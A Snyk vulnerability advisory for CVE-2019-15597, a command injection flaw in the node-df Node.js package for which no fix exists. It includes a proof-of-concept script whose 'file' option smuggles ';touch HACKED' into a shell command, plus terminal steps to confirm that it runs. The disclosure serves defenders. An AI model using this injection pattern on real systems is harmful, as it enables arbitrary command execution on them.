Command Injection Affecting node-df package, versions *
Snyk ID SNYK-JS-NODEDF-536779
- published 5 Dec 2019
- disclosed 4 Dec 2019
- credit mik317
Introduced: 4 Dec 2019
CVE-2019-15597
How to fix?
There is no fixed version for node-df.
Overview
node-df is a cross-platform Node.js wrapper around the standard Unix program df (disk free).
Affected versions of this package are vulnerable to Command Injection. The issue occurs because user-controlled input (the file option passed to df) is concatenated into a shell command string that is then executed without any validation or escaping, so shell metacharacters in the value are interpreted by the shell.
PoC by mik317

    // poc.js
    var df = require('node-df');
    var options = {
      // The ';' terminates the df command, so the shell runs 'touch HACKED' afterwards.
      file: '/;touch HACKED',
      prefixMultiplier: 'GB',
      isDisplayPrefixMultiplier: true,
      precision: 2
    };
    df(options, function (error, response) {
      if (error) { throw error; }
      console.log(JSON.stringify(response, null, 2));
    });
Execute the following commands in a terminal:

    npm i node-df  # Install affected module
    ls             # Make sure there isn't any HACKED file
    node poc.js    # Run the PoC
    ls             # The HACKED file has been created